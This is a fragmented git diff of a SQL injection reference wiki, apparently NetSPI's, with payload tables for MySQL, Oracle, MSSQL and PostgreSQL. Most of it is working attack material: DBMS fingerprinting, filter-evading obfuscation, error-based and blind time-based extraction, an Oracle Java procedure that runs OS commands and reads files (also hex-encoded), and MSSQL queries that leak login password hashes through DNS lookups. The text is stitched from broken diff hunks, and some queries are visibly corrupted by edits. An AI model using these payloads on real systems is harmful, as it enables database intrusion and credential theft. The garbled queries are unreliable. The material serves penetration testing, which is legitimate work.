| Double Query | -SELECT 1 AND(SELECT 1 FROM(SELECT COUNT(*),concat(0x3a,(SELECT username FROM USERS LIMIT 0,1),FLOOR(rand(0)*2))x FROM information_schema.TABLES GROUP BY x)a) Increment Limit 0,1 to Limit 1,1 to begin cycling through data |
-
| Get Current Database | -SELECT a() | -
Java can be used to execute commands if it's installed.
-| Description | -Query | -|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Creating Java Classes | -
- /* create Java class */ - BEGIN - EXECUTE IMMEDIATE 'create or replace and compile java source named "PwnUtil" as import java.io.*; public class PwnUtil{ public static String runCmd(String args){ try{ BufferedReader myReader = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(args).getInputStream()));String stemp, str = "";while ((stemp = myReader.readLine()) != null) str += stemp + "\n";myReader.close();return str;} catch (Exception e){ return e.toString();}} public static String readFile(String filename){ try{ BufferedReader myReader = new BufferedReader(new FileReader(filename));String stemp, str = "";while((stemp = myReader.readLine()) != null) str += stemp + "\n";myReader.close();return str;} catch (Exception e){ return e.toString();}}};'; - END; - / - - BEGIN - EXECUTE IMMEDIATE 'create or replace function PwnUtilFunc(p_cmd in varchar2) return varchar2 as language java name ''PwnUtil.runCmd(java.lang.String) return String'';'; - END; - / - - /* run OS command */ - SELECT PwnUtilFunc('ping -c 4 localhost') FROM dual; |
- |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| Creating Java Classes (Hex encoded) | -
- /* create Java class */ - SELECT TO_CHAR(dbms_xmlquery.getxml('declare PRAGMA AUTONOMOUS_TRANSACTION; begin execute immediate utl_raw.cast_to_varchar2(hextoraw(''637265617465206f72207265706c61636520616e6420636f6d70696c65206a61766120736f75726365206e616d6564202270776e7574696c2220617320696d706f7274206a6176612e696f2e2a3b7075626c696320636c6173732070776e7574696c7b7075626c69632073746174696320537472696e672072756e28537472696e672061726773297b7472797b4275666665726564526561646572206d726561643d6e6577204275666665726564526561646572286e657720496e70757453747265616d5265616465722852756e74696d652e67657452756e74696d6528292e657865632861726773292e676574496e70757453747265616d282929293b20537472696e67207374656d702c207374723d22223b207768696c6528287374656d703d6d726561642e726561644c696e6528292920213d6e756c6c29207374722b3d7374656d702b225c6e223b206d726561642e636c6f736528293b2072657475726e207374723b7d636174636828457863657074696f6e2065297b72657475726e20652e746f537472696e6728293b7d7d7d'')); - EXECUTE IMMEDIATE utl_raw.cast_to_varchar2(hextoraw(''637265617465206f72207265706c6163652066756e6374696f6e2050776e5574696c46756e6328705f636d6420696e207661726368617232292072657475726e207661726368617232206173206c616e6775616765206a617661206e616d65202770776e7574696c2e72756e286a6176612e6c616e672e537472696e67292072657475726e20537472696e67273b'')); end;')) results FROM dual - - /* run OS command */ - SELECT PwnUtilFunc('ping -c 4 localhost') FROM dual; - |
-
| Description | -Query | -
|---|---|
| Make DNS Request | -DECLARE @host varchar(800); select @host = name + '-' + master.sys.fn_varbintohexstr(password_hash) + 'netspi.com' from sys.sql_logins; exec('xp_fileexist "\' + @host + 'c$boot.ini"'); |
-
| UNC Path (DNS Request) | -xp_dirtree ‘\\data.domain.com\file’ | -
{{site.data.injectionDescriptions.dbmsIdentification}}
Note: The comment characters -- are placed after the query to remove any commmands following our query, helping to prevent errors.
| page.php?id=' 'mysql' -- | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| Error messages Note: Triggering DB errors through invalid syntax will sometimes return verbose errors messages that include the DBMS name. |
+ Functions | +connection_id() -- + row_count() -- + POW(1,1) -- |
+ ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| Error messages Note: Triggering DB errors through invalid syntax will sometimes return verbose error messages that include the DBMS name. |
page.php?id=' |
| String concatenation | page.jsp?id='||'oracle' -- | +|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| Functions | +BITAND(1,1) -- | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| Default table | page.jsp?id='UNION SELECT 1 FROM v$version -- | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| Error messages Note: Triggering DB errors through invalid syntax will sometimes return verbose errors messages that include the DBMS name. |
+ Error messages Note: Triggering DB errors through invalid syntax will sometimes return verbose error messages that include the DBMS name. |
page.jsp?id=' |
| page.asp?id=sql'; SELECT @@SERVERNAME -- | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| Error messages Note: Triggering DB errors through invalid syntax will sometimes return verbose errors messages that include the DBMS name. |
+ String concatenation | +page.php?id='mssql'+'mssql' -- | +||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| Functions | +@@rowcount -- + SQUARE(1) -- + @@pack_received -- |
+ |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| Error messages Note: Triggering DB errors through invalid syntax will sometimes return verbose error messages that include the DBMS name. |
page.asp?id=' | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| Description | +Query | +
|---|---|
| Logic Testing |
+ page.asp?id=1 or 1=1 -- true page.asp?id=1' or 1=1 -- true page.asp?id=1" or 1=1 -- true page.asp?id=1 and 1=2 -- false |
+
| Arithmetic | +product.asp?id=1/1 -- true product.asp?id=1/0 -- false + product.asp?id=1/abs(1) -- true product.asp?id=1/abf(1) -- false |
+
| Blind based Note: Detecting blind injection may require identification or guess-and-check of the DBMS to find the proper timing function. |
+ See here | +
| Error based Note: Logic testing and arithmetic with invalid syntax may also help cause errors. |
+ See here | +
This wiki's mission is to be a one stop resource for fully identifying, exploiting, and escalating SQL injection vulnerabilities across various Database Management Systems (DBMS). This wiki assumes you have a basic understanding of SQL injection, please + go here for an introduction if you are unfamiliar.
+Below is an outline of the wiki's structure, laid out in the order of a normal escalation path. Certain queries may be version specific.
+Please feel free to submit pull requests or issues on our Github if you notice something that is missing or inaccurate.
- - - -
- {{site.data.injectionDescriptions.conditionalStatements}}
| If/Else | SELECT IF(1=2,'true','false') | +
| If/Else (json) | +{"id"="xxx AND IF(length(database())=’1’, SLEEP(15),1)#”} If the database name's length is 1, database gets unresponsive with given miliseconds |
+
| Logical OR | SELECT 1 || 0 To see nuances of this operator go here |
| AND (json) | +{"id"="xxx AND 1=1#"} True statement {"id"="xxx AND 1=2#"} False statement |
+
{{site.data.injectionDescriptions.conditionalStatements}}
| Case | -SELECT CASE WHEN 1=1 THEN 1 ELSE 0 END | +SELECT CASE WHEN 1 = 1 THEN 1 ELSE 0 END AS Result; | |||||||||||||||||||||||||||||||||||||||||||||||||
| If/Else | diff --git a/injectionTechniques/index.html b/injectionTechniques/index.html new file mode 100644 index 0000000..6c73ef9 --- /dev/null +++ b/injectionTechniques/index.html @@ -0,0 +1,16 @@ +--- +layout: default +description: The following techniques will aid in gaining first exploitation of a new SQL Injection. +keywords: techniques, how-to, obfuscation, placement, conditional statements +title: Injection Techniques | NetSPI SQL Injection Wiki +--- +
| Hex > Int | SELECT 0x20 + 0x40 | +|
| Unhex/hex | +unhex(hex(user())) | +|
| Bitwise AND | SELECT 6 & 2 | @@ -72,7 +76,11 @@|
| Single line comment | -SELECT 1 -- comments out rest of line SELECT 1 # comments out rest of line |
+ SELECT 1 -- comments out rest of line SELECT 1 # comments out rest of line SELECT 1 --+ - Comments out rest of the line SELECT 1 --+- - Comments out rest of the line SELECT 1 -- - - Comments out rest of the line SELECT 1 %00 - Comments out rest of the line |
+
| In-line comment | +SEL/*_*/ECT * FR/*_*/OM | |
| No Spaces | @@ -94,6 +102,10 @@Invalid Percent Encode | %SEL%ECT * F%R%OM U%S%ERS |
| character obfuscation | +SeLeCt * FrOm | +
{{site.data.injectionDescriptions.injectionObfuscation}}
| SELECT 1 FROM dual -- comment | |||||
| If statement | +If Statement | BEGIN IF 1=1 THEN dbms_lock.sleep(3); ELSE dbms_lock.sleep(0); END IF; | |||
| User is root (Benchmark method) | -SELECT IF(user() LIKE 'root@%', BENCHMARK(5000000, ENCODE('Slow Down','by 5 seconds')), null) | +SELECT * from (user() LIKE 'root@%', BENCHMARK(5000000, ENCODE('Slow Down','by 5 seconds')), null) |
| Version is 5.x.x | -SELECT IF(SUBSTRING(version(),1,1)=5,SLEEP(5),null) | +SELECT * from (SUBSTRING(version(),1,1)=5,SLEEP(5),null) |
{{site.data.injectionDescriptions.blindBased}}
-Partial-blind injections can be determined by differing HTTP status codes, response times, content-lengths, and HTML contents in the HTTP response. These markers can indicate true or false statements. The queries below will attempt to exploit the injection by asserting a true or false response upon guessed information. True or false queries can also be identified by returning 1(True) or 0(False) rows. An error can also be used to identify 0(False).
@@ -40,13 +40,13 @@Any of the above queries can be used in full-blind scenarios by using the following conversion: SELECT CASE WHEN (*PARTIAL_BLIND_QUERY*)=1 THEN (SELECT count(*) FROM all_users a, all_users b, all_users c, all_users d) ELSE 0 END FROM dual
The partial-blind query must return one row, so always attempt to use COUNT on the column being selected. Add "all_users [letter]" ad naseum until the database response slows. You may need to cycle though [letter] if the database is caching responses.
-Full-blind queries do not indicate any result of the query in the HTTP/HTML response. This makes them dependent upon timing functions and other out-of-band methods for attacks. A true statement will take X seconds to respond, a false statement should return immediately.
+Full-blind queries do not indicate any result of the query in the HTTP/HTML response. This makes them dependent upon timing functions and other out-of-band methods for attacks. A true statement will take X seconds to respond, a false statement should return immediately.
| Query | +
|---|
| AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) | +
| AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) | +
{{site.data.injectionDescriptions.blindBased}}
-Partial-blind injections can be determined by differing HTTP status codes, response times, content-lengths, and HTML contents in the HTTP response. These markers can indicate true or false statements. The queries below will attempt to exploit the injection by asserting a true or false response upon guessed information. True or false queries can also be identified by returning 1(True) or 0(False) rows. An error can also be used to identify 0(False).
@@ -24,7 +24,7 @@Any of the above queries can be used in full-blind scenarios by using the following conversion: IF exists(*PARTIAL_BLIND_QUERY*) WAITFOR DELAY '00:00:02'
Full-blind queries do not indicate any result of the query in the HTTP/HTML response. This makes them dependent upon timing functions and other out-of-band methods for attacks. A true statement will take X seconds to respond, a false statement should return immediately.
+Full-blind queries do not indicate any result of the query in the HTTP/HTML response. This makes them dependent upon timing functions and other out-of-band methods for attacks. A true statement will take X seconds to respond, a false statement should return immediately.
| Description | +Query | +
|---|---|
| Amount of columns using ORDER BY | +ORDER BY 1
+ + Add this at the end of your query + If you get no error you know ordering is working + Increment the number from 1 until you get an error. Then you know the amount of columns for this table + |
+
| Amount of columns using UNION SELECT | +UNION SELECT 1,2
+ + Add this at the end of your query + Add increment until you see a valid response, e.g. UNION SELECT 1,2,3 + If you get no error you know union select is working. You can try to find the values on the page to see where the output goes. + |
+
| XML Parse Error | +SELECT extractvalue(rand(),concat(0x3a,(select version()))) | +
| Double Query | +SELECT 1 AND(SELECT 1 FROM(SELECT COUNT(*),concat(0x3a,(SELECT username FROM USERS LIMIT 0,1),FLOOR(rand(0)*2))x FROM information_schema.TABLES GROUP BY x)a) Increment Limit 0,1 to Limit 1,1 to begin cycling through data |
+
| Get Current Database | +SELECT a() | +
{{site.data.injectionDescriptions.errorBased}}
| Query | +
|---|
| ,cAsT(chr(126)||vErSiOn()||chr(126)+aS+nUmeRiC) | +
| ,cAsT(chr(126)||(sEleCt+table_name+fRoM+information_schema.tables+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)-- | +
| ,cAsT(chr(126)||(sEleCt+column_name+fRoM+information_schema.columns+wHerE+table_name=data_column+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)-- | +
| ,cAsT(chr(126)||(sEleCt+data_column+fRoM+data_table+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC) | +
{{site.data.injectionDescriptions.errorBased}}
| before truncating
-var PREVIEW_LENGTH = 1000;
-
-loadPage()
-//Load the page
-function loadPage() {
- if (window.location.pathname == '/') { //Default to home
- $.get('/views/home.html?' + VERSION, function(response, data) {
- $('#contentContainer').html(response);
- })
- activePage = 'home';
- } else { //We at least have a pageType
- var pageType = getRouteProperty('pageType');
- var topicType = getRouteProperty('topicType');
- var tabType = getParameterByName('dbms');
- //If the page or topic type changed we should probably load new info
- if (activePage !== pageType || activeTopicType !== topicType) {
- $("#contentContainer").prepend(ABSOLUTE_LOADER);
- if (pageType != TAB_PAGE_TYPE) { //Tabbed pages need to be handled differently
- $.get('/views/' + pageType + '.html?' + VERSION, function(response, data) {
- if (response.indexOf('') > -1 && response.indexOf(' |